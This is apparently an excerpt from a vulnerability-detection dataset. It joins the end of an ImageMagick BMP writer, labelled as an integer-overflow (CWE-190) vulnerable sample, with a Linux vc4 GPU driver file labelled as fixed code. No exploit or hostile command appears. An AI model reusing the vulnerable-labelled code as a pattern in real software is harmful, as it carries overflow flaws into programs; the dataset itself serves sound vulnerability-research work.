}
}
if (bmp_info.number_colors == 0)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=unspecified");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=%lu",bmp_info.number_colors);
}
(void) WriteBlob(image,2,(unsigned char *) "BM");
(void) WriteBlobLSBLong(image,bmp_info.file_size);
(void) WriteBlobLSBLong(image,bmp_info.ba_offset); /* always 0 */
(void) WriteBlobLSBLong(image,bmp_info.offset_bits);
if (type == 2)
{
/*
Write 12-byte version 2 bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.width);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
}
else
{
/*
Write 40-byte version 3+ bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.width);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
(void) WriteBlobLSBLong(image,bmp_info.compression);
(void) WriteBlobLSBLong(image,bmp_info.image_size);
(void) WriteBlobLSBLong(image,bmp_info.x_pixels);
(void) WriteBlobLSBLong(image,bmp_info.y_pixels);
(void) WriteBlobLSBLong(image,bmp_info.number_colors);
(void) WriteBlobLSBLong(image,bmp_info.colors_important);
}
if ((type > 3) && ((image->alpha_trait != UndefinedPixelTrait) ||
(have_color_info != MagickFalse)))
{
/*
Write the rest of the 108-byte BMP Version 4 header.
*/
(void) WriteBlobLSBLong(image,0x00ff0000U); /* Red mask */
(void) WriteBlobLSBLong(image,0x0000ff00U); /* Green mask */
(void) WriteBlobLSBLong(image,0x000000ffU); /* Blue mask */
(void) WriteBlobLSBLong(image,0xff000000U); /* Alpha mask */
(void) WriteBlobLSBLong(image,0x73524742U); /* sRGB */
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.red_primary.x+
image->chromaticity.red_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.green_primary.x+
image->chromaticity.green_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.blue_primary.x+
image->chromaticity.blue_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.x*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.y*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.z*0x10000));
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
ssize_t
intent;
switch ((int) image->rendering_intent)
{
case SaturationIntent:
{
intent=LCS_GM_BUSINESS;
break;
}
case RelativeIntent:
{
intent=LCS_GM_GRAPHICS;
break;
}
case PerceptualIntent:
{
intent=LCS_GM_IMAGES;
break;
}
case AbsoluteIntent:
{
intent=LCS_GM_ABS_COLORIMETRIC;
break;
}
default:
{
intent=0;
break;
}
}
(void) WriteBlobLSBLong(image,(unsigned int) intent);
(void) WriteBlobLSBLong(image,0x00); /* dummy profile data */
(void) WriteBlobLSBLong(image,0x00); /* dummy profile length */
(void) WriteBlobLSBLong(image,0x00); /* reserved */
}
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
/*
Dump colormap to file.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Colormap: %.20g entries",(double) image->colors);
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL <<
bmp_info.bits_per_pixel),4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
q=bmp_colormap;
for (i=0; i < (ssize_t) MagickMin((ssize_t) image->colors,(ssize_t) bmp_info.number_colors); i++)
{
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].blue));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].green));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].red));
if (type > 2)
*q++=(unsigned char) 0x0;
}
for ( ; i < (ssize_t) (1UL << bmp_info.bits_per_pixel); i++)
{
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
if (type > 2)
*q++=(unsigned char) 0x00;
}
if (type <= 2)
(void) WriteBlob(image,(size_t) (3*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
else
(void) WriteBlob(image,(size_t) (4*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Pixels: %lu bytes",bmp_info.image_size);
(void) WriteBlob(image,(size_t) bmp_info.image_size,pixels);
pixel_info=RelinquishVirtualMemory(pixel_info);
if (GetNextImageInList(image) == (Image *) NULL)
break;
image=SyncNextImageInList(image);
status=SetImageProgress(image,SaveImagesTag,scene++,
GetImageListLength(image));
if (status == MagickFalse)
break;
} while (image_info->adjoin != MagickFalse);
(void) CloseBlob(image);
return(MagickTrue);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5223_1 |
crossvul-cpp_data_good_3121_0 | /*
* Copyright © 2014 Broadcom
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/pm_runtime.h>
#include <linux/device.h>
#include <linux/io.h>
#include "uapi/drm/vc4_drm.h"
#include "vc4_drv.h"
#include "vc4_regs.h"
#include "vc4_trace.h"
static void
vc4_queue_hangcheck(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
mod_timer(&vc4->hangcheck.timer,
round_jiffies_up(jiffies + msecs_to_jiffies(100)));
}
struct vc4_hang_state {
struct drm_vc4_get_hang_state user_state;
u32 bo_count;
struct drm_gem_object **bo;
};
static void
vc4_free_hang_state(struct drm_device *dev, struct vc4_hang_state *state)
{
unsigned int i;
for (i = 0; i < state->user_state.bo_count; i++)
drm_gem_object_unreference_unlocked(state->bo[i]);
kfree(state);
}
int
vc4_get_hang_state_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct drm_vc4_get_hang_state *get_state = data;
struct drm_vc4_get_hang_state_bo *bo_state;
struct vc4_hang_state *kernel_state;
struct drm_vc4_get_hang_state *state;
struct vc4_dev *vc4 = to_vc4_dev(dev);
unsigned long irqflags;
u32 i;
int ret = 0;
spin_lock_irqsave(&vc4->job_lock, irqflags);
kernel_state = vc4->hang_state;
if (!kernel_state) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return -ENOENT;
}
state = &kernel_state->user_state;
/* If the user's array isn't big enough, just return the
* required array size.
*/
if (get_state->bo_count < state->bo_count) {
get_state->bo_count = state->bo_count;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return 0;
}
vc4->hang_state = NULL;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
/* Save the user's BO pointer, so we don't stomp it with the memcpy. */
state->bo = get_state->bo;
memcpy(get_state, state, sizeof(*state));
bo_state = kcalloc(state->bo_count, sizeof(*bo_state), GFP_KERNEL);
if (!bo_state) {
ret = -ENOMEM;
goto err_free;
}
for (i = 0; i < state->bo_count; i++) {
struct vc4_bo *vc4_bo = to_vc4_bo(kernel_state->bo[i]);
u32 handle;
ret = drm_gem_handle_create(file_priv, kernel_state->bo[i],
&handle);
if (ret) {
state->bo_count = i - 1;
goto err;
}
bo_state[i].handle = handle;
bo_state[i].paddr = vc4_bo->base.paddr;
bo_state[i].size = vc4_bo->base.base.size;
}
if (copy_to_user((void __user *)(uintptr_t)get_state->bo,
bo_state,
state->bo_count * sizeof(*bo_state)))
ret = -EFAULT;
kfree(bo_state);
err_free:
vc4_free_hang_state(dev, kernel_state);
err:
return ret;
}
static void
vc4_save_hang_state(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct drm_vc4_get_hang_state *state;
struct vc4_hang_state *kernel_state;
struct vc4_exec_info *exec[2];
struct vc4_bo *bo;
unsigned long irqflags;
unsigned int i, j, unref_list_count, prev_idx;
kernel_state = kcalloc(1, sizeof(*kernel_state), GFP_KERNEL);
if (!kernel_state)
return;
state = &kernel_state->user_state;
spin_lock_irqsave(&vc4->job_lock, irqflags);
exec[0] = vc4_first_bin_job(vc4);
exec[1] = vc4_first_render_job(vc4);
if (!exec[0] && !exec[1]) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
/* Get the bos from both binner and renderer into hang state. */
state->bo_count = 0;
for (i = 0; i < 2; i++) {
if (!exec[i])
continue;
unref_list_count = 0;
list_for_each_entry(bo, &exec[i]->unref_list, unref_head)
unref_list_count++;
state->bo_count += exec[i]->bo_count + unref_list_count;
}
kernel_state->bo = kcalloc(state->bo_count,
sizeof(*kernel_state->bo), GFP_ATOMIC);
if (!kernel_state->bo) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
prev_idx = 0;
for (i = 0; i < 2; i++) {
if (!exec[i])
continue;
for (j = 0; j < exec[i]->bo_count; j++) {
drm_gem_object_reference(&exec[i]->bo[j]->base);
kernel_state->bo[j + prev_idx] = &exec[i]->bo[j]->base;
}
list_for_each_entry(bo, &exec[i]->unref_list, unref_head) {
drm_gem_object_reference(&bo->base.base);
kernel_state->bo[j + prev_idx] = &bo->base.base;
j++;
}
prev_idx = j + 1;
}
if (exec[0])
state->start_bin = exec[0]->ct0ca;
if (exec[1])
state->start_render = exec[1]->ct1ca;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
state->ct0ca = V3D_READ(V3D_CTNCA(0));
state->ct0ea = V3D_READ(V3D_CTNEA(0));
state->ct1ca = V3D_READ(V3D_CTNCA(1));
state->ct1ea = V3D_READ(V3D_CTNEA(1));
state->ct0cs = V3D_READ(V3D_CTNCS(0));
state->ct1cs = V3D_READ(V3D_CTNCS(1));
state->ct0ra0 = V3D_READ(V3D_CT00RA0);
state->ct1ra0 = V3D_READ(V3D_CT01RA0);
state->bpca = V3D_READ(V3D_BPCA);
state->bpcs = V3D_READ(V3D_BPCS);
state->bpoa = V3D_READ(V3D_BPOA);
state->bpos = V3D_READ(V3D_BPOS);
state->vpmbase = V3D_READ(V3D_VPMBASE);
state->dbge = V3D_READ(V3D_DBGE);
state->fdbgo = V3D_READ(V3D_FDBGO);
state->fdbgb = V3D_READ(V3D_FDBGB);
state->fdbgr = V3D_READ(V3D_FDBGR);
state->fdbgs = V3D_READ(V3D_FDBGS);
state->errstat = V3D_READ(V3D_ERRSTAT);
spin_lock_irqsave(&vc4->job_lock, irqflags);
if (vc4->hang_state) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_free_hang_state(dev, kernel_state);
} else {
vc4->hang_state = kernel_state;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
}
static void
vc4_reset(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
DRM_INFO("Resetting GPU.\n");
mutex_lock(&vc4->power_lock);
if (vc4->power_refcount) {
/* Power the device off and back on by dropping the
* reference on runtime PM.
*/
pm_runtime_put_sync_suspend(&vc4->v3d->pdev->dev);
pm_runtime_get_sync(&vc4->v3d->pdev->dev);
}
mutex_unlock(&vc4->power_lock);
vc4_irq_reset(dev);
/* Rearm the hangcheck -- another job might have been waiting
* for our hung one to get kicked off, and vc4_irq_reset()
* would have started it.
*/
vc4_queue_hangcheck(dev);
}
static void
vc4_reset_work(struct work_struct *work)
{
struct vc4_dev *vc4 =
container_of(work, struct vc4_dev, hangcheck.reset_work);
vc4_save_hang_state(vc4->dev);
vc4_reset(vc4->dev);
}
static void
vc4_hangcheck_elapsed(unsigned long data)
{
struct drm_device *dev = (struct drm_device *)data;
struct vc4_dev *vc4 = to_vc4_dev(dev);
uint32_t ct0ca, ct1ca;
unsigned long irqflags;
struct vc4_exec_info *bin_exec, *render_exec;
spin_lock_irqsave(&vc4->job_lock, irqflags);
bin_exec = vc4_first_bin_job(vc4);
render_exec = vc4_first_render_job(vc4);
/* If idle, we can stop watching for hangs. */
if (!bin_exec && !render_exec) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
ct0ca = V3D_READ(V3D_CTNCA(0));
ct1ca = V3D_READ(V3D_CTNCA(1));
/* If we've made any progress in execution, rearm the timer
* and wait.
*/
if ((bin_exec && ct0ca != bin_exec->last_ct0ca) ||
(render_exec && ct1ca != render_exec->last_ct1ca)) {
if (bin_exec)
bin_exec->last_ct0ca = ct0ca;
if (render_exec)
render_exec->last_ct1ca = ct1ca;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_queue_hangcheck(dev);
return;
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
/* We've gone too long with no progress, reset. This has to
* be done from a work struct, since resetting can sleep and
* this timer hook isn't allowed to.
*/
schedule_work(&vc4->hangcheck.reset_work);
}
static void
submit_cl(struct drm_device *dev, uint32_t thread, uint32_t start, uint32_t end)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Set the current and end address of the control list.
* Writing the end register is what starts the job.
*/
V3D_WRITE(V3D_CTNCA(thread), start);
V3D_WRITE(V3D_CTNEA(thread), end);
}
int
vc4_wait_for_seqno(struct drm_device *dev, uint64_t seqno, uint64_t timeout_ns,
bool interruptible)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
int ret = 0;
unsigned long timeout_expire;
DEFINE_WAIT(wait);
if (vc4->finished_seqno >= seqno)
return 0;
if (timeout_ns == 0)
return -ETIME;
timeout_expire = jiffies + nsecs_to_jiffies(timeout_ns);
trace_vc4_wait_for_seqno_begin(dev, seqno, timeout_ns);
for (;;) {
prepare_to_wait(&vc4->job_wait_queue, &wait,
interruptible ? TASK_INTERRUPTIBLE :
TASK_UNINTERRUPTIBLE);
if (interruptible && signal_pending(current)) {
ret = -ERESTARTSYS;
break;
}
if (vc4->finished_seqno >= seqno)
break;
if (timeout_ns != ~0ull) {
if (time_after_eq(jiffies, timeout_expire)) {
ret = -ETIME;
break;
}
schedule_timeout(timeout_expire - jiffies);
} else {
schedule();
}
}
finish_wait(&vc4->job_wait_queue, &wait);
trace_vc4_wait_for_seqno_end(dev, seqno);
return ret;
}
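/* A note on the wait loop above: prepare_to_wait() is called before
 * finished_seqno is re-checked, so a wakeup from the job-done path that
 * races with the check is not lost; schedule_timeout() then bounds each
 * sleep when the caller asked for a finite timeout, while a timeout of
 * ~0ull means wait forever.
 */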
static void
vc4_flush_caches(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Flush the GPU L2 caches. These caches sit on top of system
* L3 (the 128kb or so shared with the CPU), and are
* non-allocating in the L3.
*/
V3D_WRITE(V3D_L2CACTL,
V3D_L2CACTL_L2CCLR);
V3D_WRITE(V3D_SLCACTL,
VC4_SET_FIELD(0xf, V3D_SLCACTL_T1CC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_T0CC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_UCC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_ICC));
}
/* Sets the registers for the next job to actually be executed in
* the hardware.
*
* The job_lock should be held during this.
*/
void
vc4_submit_next_bin_job(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct vc4_exec_info *exec;
again:
exec = vc4_first_bin_job(vc4);
if (!exec)
return;
vc4_flush_caches(dev);
/* Either put the job in the binner if it uses the binner, or
* immediately move it to the to-be-rendered queue.
*/
if (exec->ct0ca != exec->ct0ea) {
submit_cl(dev, 0, exec->ct0ca, exec->ct0ea);
} else {
vc4_move_job_to_render(dev, exec);
goto again;
}
}
void
vc4_submit_next_render_job(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct vc4_exec_info *exec = vc4_first_render_job(vc4);
if (!exec)
return;
submit_cl(dev, 1, exec->ct1ca, exec->ct1ea);
}
void
vc4_move_job_to_render(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
bool was_empty = list_empty(&vc4->render_job_list);
list_move_tail(&exec->head, &vc4->render_job_list);
if (was_empty)
vc4_submit_next_render_job(dev);
}
static void
vc4_update_bo_seqnos(struct vc4_exec_info *exec, uint64_t seqno)
{
struct vc4_bo *bo;
unsigned i;
for (i = 0; i < exec->bo_count; i++) {
bo = to_vc4_bo(&exec->bo[i]->base);
bo->seqno = seqno;
}
list_for_each_entry(bo, &exec->unref_list, unref_head) {
bo->seqno = seqno;
}
for (i = 0; i < exec->rcl_write_bo_count; i++) {
bo = to_vc4_bo(&exec->rcl_write_bo[i]->base);
bo->write_seqno = seqno;
}
}
/* Queues a struct vc4_exec_info for execution. If no job is
* currently executing, then submits it.
*
* Unlike most GPUs, our hardware only handles one command list at a
* time. To queue multiple jobs at once, we'd need to edit the
* previous command list to have a jump to the new one at the end, and
* then bump the end address. That's a change for a later date,
* though.
*/
static void
vc4_queue_submit(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
uint64_t seqno;
unsigned long irqflags;
spin_lock_irqsave(&vc4->job_lock, irqflags);
seqno = ++vc4->emit_seqno;
exec->seqno = seqno;
vc4_update_bo_seqnos(exec, seqno);
list_add_tail(&exec->head, &vc4->bin_job_list);
/* If no job was executing, kick ours off. Otherwise, it'll
* get started when the previous job's flush done interrupt
* occurs.
*/
if (vc4_first_bin_job(vc4) == exec) {
vc4_submit_next_bin_job(dev);
vc4_queue_hangcheck(dev);
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
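/* Sequence numbers tie the pieces above together: vc4_queue_submit() stamps
 * the job and its BOs with a fresh seqno via vc4_update_bo_seqnos(),
 * vc4->finished_seqno is advanced elsewhere (presumably from the render-done
 * interrupt path, which is not part of this file), and
 * vc4_wait_for_seqno()/vc4_wait_bo_ioctl() compare against that counter to
 * decide when a given submission or buffer has finished rendering.
 */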
/**
* Looks up a bunch of GEM handles for BOs and stores the array for
* use in the command validator that actually writes relocated
* addresses pointing to them.
*/
static int
vc4_cl_lookup_bos(struct drm_device *dev,
struct drm_file *file_priv,
struct vc4_exec_info *exec)
{
struct drm_vc4_submit_cl *args = exec->args;
uint32_t *handles;
int ret = 0;
int i;
exec->bo_count = args->bo_handle_count;
if (!exec->bo_count) {
/* See comment on bo_index for why we have to check
* this.
*/
DRM_ERROR("Rendering requires BOs to validate\n");
return -EINVAL;
}
exec->bo = drm_calloc_large(exec->bo_count,
sizeof(struct drm_gem_cma_object *));
if (!exec->bo) {
DRM_ERROR("Failed to allocate validated BO pointers\n");
return -ENOMEM;
}
handles = drm_malloc_ab(exec->bo_count, sizeof(uint32_t));
if (!handles) {
ret = -ENOMEM;
DRM_ERROR("Failed to allocate incoming GEM handles\n");
goto fail;
}
if (copy_from_user(handles,
(void __user *)(uintptr_t)args->bo_handles,
exec->bo_count * sizeof(uint32_t))) {
ret = -EFAULT;
DRM_ERROR("Failed to copy in GEM handles\n");
goto fail;
}
spin_lock(&file_priv->table_lock);
for (i = 0; i < exec->bo_count; i++) {
struct drm_gem_object *bo = idr_find(&file_priv->object_idr,
handles[i]);
if (!bo) {
DRM_ERROR("Failed to look up GEM BO %d: %d\n",
i, handles[i]);
ret = -EINVAL;
spin_unlock(&file_priv->table_lock);
goto fail;
}
drm_gem_object_reference(bo);
exec->bo[i] = (struct drm_gem_cma_object *)bo;
}
spin_unlock(&file_priv->table_lock);
fail:
drm_free_large(handles);
return ret;
}
static int
vc4_get_bcl(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct drm_vc4_submit_cl *args = exec->args;
void *temp = NULL;
void *bin;
int ret = 0;
uint32_t bin_offset = 0;
uint32_t shader_rec_offset = roundup(bin_offset + args->bin_cl_size,
16);
uint32_t uniforms_offset = shader_rec_offset + args->shader_rec_size;
uint32_t exec_size = uniforms_offset + args->uniforms_size;
uint32_t temp_size = exec_size + (sizeof(struct vc4_shader_state) *
args->shader_rec_count);
struct vc4_bo *bo;
if (shader_rec_offset < args->bin_cl_size ||
uniforms_offset < shader_rec_offset ||
exec_size < uniforms_offset ||
args->shader_rec_count >= (UINT_MAX /
sizeof(struct vc4_shader_state)) ||
temp_size < exec_size) {
DRM_ERROR("overflow in exec arguments\n");
goto fail;
}
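/* The checks above catch unsigned wraparound in the offset arithmetic:
 * every offset is computed by adding a user-controlled size to the previous
 * offset, so if, say, args->bin_cl_size is close to UINT_MAX,
 * shader_rec_offset wraps around and ends up smaller than bin_cl_size,
 * which the first comparison rejects.  The shader_rec_count bound guards
 * the multiplication folded into temp_size in the same way.
 */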
/* Allocate space where we'll store the copied in user command lists
* and shader records.
*
* We don't just copy directly into the BOs because we need to
* read the contents back for validation, and I think the
* bo->vaddr is uncached access.
*/
temp = drm_malloc_ab(temp_size, 1);
if (!temp) {
DRM_ERROR("Failed to allocate storage for copying "
"in bin/render CLs.\n");
ret = -ENOMEM;
goto fail;
}
bin = temp + bin_offset;
exec->shader_rec_u = temp + shader_rec_offset;
exec->uniforms_u = temp + uniforms_offset;
exec->shader_state = temp + exec_size;
exec->shader_state_size = args->shader_rec_count;
if (copy_from_user(bin,
(void __user *)(uintptr_t)args->bin_cl,
args->bin_cl_size)) {
ret = -EFAULT;
goto fail;
}
if (copy_from_user(exec->shader_rec_u,
(void __user *)(uintptr_t)args->shader_rec,
args->shader_rec_size)) {
ret = -EFAULT;
goto fail;
}
if (copy_from_user(exec->uniforms_u,
(void __user *)(uintptr_t)args->uniforms,
args->uniforms_size)) {
ret = -EFAULT;
goto fail;
}
bo = vc4_bo_create(dev, exec_size, true);
if (IS_ERR(bo)) {
DRM_ERROR("Couldn't allocate BO for binning\n");
ret = PTR_ERR(bo);
goto fail;
}
exec->exec_bo = &bo->base;
list_add_tail(&to_vc4_bo(&exec->exec_bo->base)->unref_head,
&exec->unref_list);
exec->ct0ca = exec->exec_bo->paddr + bin_offset;
exec->bin_u = bin;
exec->shader_rec_v = exec->exec_bo->vaddr + shader_rec_offset;
exec->shader_rec_p = exec->exec_bo->paddr + shader_rec_offset;
exec->shader_rec_size = args->shader_rec_size;
exec->uniforms_v = exec->exec_bo->vaddr + uniforms_offset;
exec->uniforms_p = exec->exec_bo->paddr + uniforms_offset;
exec->uniforms_size = args->uniforms_size;
ret = vc4_validate_bin_cl(dev,
exec->exec_bo->vaddr + bin_offset,
bin,
exec);
if (ret)
goto fail;
ret = vc4_validate_shader_recs(dev, exec);
if (ret)
goto fail;
/* Block waiting on any previous rendering into the CS's VBO,
* IB, or textures, so that pixels are actually written by the
* time we try to read them.
*/
ret = vc4_wait_for_seqno(dev, exec->bin_dep_seqno, ~0ull, true);
fail:
drm_free_large(temp);
return ret;
}
static void
vc4_complete_exec(struct drm_device *dev, struct vc4_exec_info *exec)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
unsigned i;
if (exec->bo) {
for (i = 0; i < exec->bo_count; i++)
drm_gem_object_unreference_unlocked(&exec->bo[i]->base);
drm_free_large(exec->bo);
}
while (!list_empty(&exec->unref_list)) {
struct vc4_bo *bo = list_first_entry(&exec->unref_list,
struct vc4_bo, unref_head);
list_del(&bo->unref_head);
drm_gem_object_unreference_unlocked(&bo->base.base);
}
mutex_lock(&vc4->power_lock);
if (--vc4->power_refcount == 0) {
pm_runtime_mark_last_busy(&vc4->v3d->pdev->dev);
pm_runtime_put_autosuspend(&vc4->v3d->pdev->dev);
}
mutex_unlock(&vc4->power_lock);
kfree(exec);
}
void
vc4_job_handle_completed(struct vc4_dev *vc4)
{
unsigned long irqflags;
struct vc4_seqno_cb *cb, *cb_temp;
spin_lock_irqsave(&vc4->job_lock, irqflags);
while (!list_empty(&vc4->job_done_list)) {
struct vc4_exec_info *exec =
list_first_entry(&vc4->job_done_list,
struct vc4_exec_info, head);
list_del(&exec->head);
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_complete_exec(vc4->dev, exec);
spin_lock_irqsave(&vc4->job_lock, irqflags);
}
list_for_each_entry_safe(cb, cb_temp, &vc4->seqno_cb_list, work.entry) {
if (cb->seqno <= vc4->finished_seqno) {
list_del_init(&cb->work.entry);
schedule_work(&cb->work);
}
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
static void vc4_seqno_cb_work(struct work_struct *work)
{
struct vc4_seqno_cb *cb = container_of(work, struct vc4_seqno_cb, work);
cb->func(cb);
}
int vc4_queue_seqno_cb(struct drm_device *dev,
struct vc4_seqno_cb *cb, uint64_t seqno,
void (*func)(struct vc4_seqno_cb *cb))
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
int ret = 0;
unsigned long irqflags;
cb->func = func;
INIT_WORK(&cb->work, vc4_seqno_cb_work);
spin_lock_irqsave(&vc4->job_lock, irqflags);
if (seqno > vc4->finished_seqno) {
cb->seqno = seqno;
list_add_tail(&cb->work.entry, &vc4->seqno_cb_list);
} else {
schedule_work(&cb->work);
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return ret;
}
/* Scheduled when any job has been completed, this walks the list of
* jobs that had completed and unrefs their BOs and frees their exec
* structs.
*/
static void
vc4_job_done_work(struct work_struct *work)
{
struct vc4_dev *vc4 =
container_of(work, struct vc4_dev, job_done_work);
vc4_job_handle_completed(vc4);
}
static int
vc4_wait_for_seqno_ioctl_helper(struct drm_device *dev,
uint64_t seqno,
uint64_t *timeout_ns)
{
unsigned long start = jiffies;
int ret = vc4_wait_for_seqno(dev, seqno, *timeout_ns, true);
if ((ret == -EINTR || ret == -ERESTARTSYS) && *timeout_ns != ~0ull) {
uint64_t delta = jiffies_to_nsecs(jiffies - start);
if (*timeout_ns >= delta)
*timeout_ns -= delta;
}
return ret;
}
int
vc4_wait_seqno_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct drm_vc4_wait_seqno *args = data;
return vc4_wait_for_seqno_ioctl_helper(dev, args->seqno,
&args->timeout_ns);
}
int
vc4_wait_bo_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
int ret;
struct drm_vc4_wait_bo *args = data;
struct drm_gem_object *gem_obj;
struct vc4_bo *bo;
if (args->pad != 0)
return -EINVAL;
gem_obj = drm_gem_object_lookup(file_priv, args->handle);
if (!gem_obj) {
DRM_ERROR("Failed to look up GEM BO %d\n", args->handle);
return -EINVAL;
}
bo = to_vc4_bo(gem_obj);
ret = vc4_wait_for_seqno_ioctl_helper(dev, bo->seqno,
&args->timeout_ns);
drm_gem_object_unreference_unlocked(gem_obj);
return ret;
}
/**
* Submits a command list to the VC4.
*
* This is what is called batchbuffer emitting on other hardware.
*/
int
vc4_submit_cl_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct drm_vc4_submit_cl *args = data;
struct vc4_exec_info *exec;
int ret = 0;
if ((args->flags & ~VC4_SUBMIT_CL_USE_CLEAR_COLOR) != 0) {
DRM_ERROR("Unknown flags: 0x%02x\n", args->flags);
return -EINVAL;
}
exec = kcalloc(1, sizeof(*exec), GFP_KERNEL);
if (!exec) {
DRM_ERROR("malloc failure on exec struct\n");
return -ENOMEM;
}
mutex_lock(&vc4->power_lock);
if (vc4->power_refcount++ == 0)
ret = pm_runtime_get_sync(&vc4->v3d->pdev->dev);
mutex_unlock(&vc4->power_lock);
if (ret < 0) {
kfree(exec);
return ret;
}
exec->args = args;
INIT_LIST_HEAD(&exec->unref_list);
ret = vc4_cl_lookup_bos(dev, file_priv, exec);
if (ret)
goto fail;
if (exec->args->bin_cl_size != 0) {
ret = vc4_get_bcl(dev, exec);
if (ret)
goto fail;
} else {
exec->ct0ca = 0;
exec->ct0ea = 0;
}
ret = vc4_get_rcl(dev, exec);
if (ret)
goto fail;
/* Clear this out of the struct we'll be putting in the queue,
* since it's part of our stack.
*/
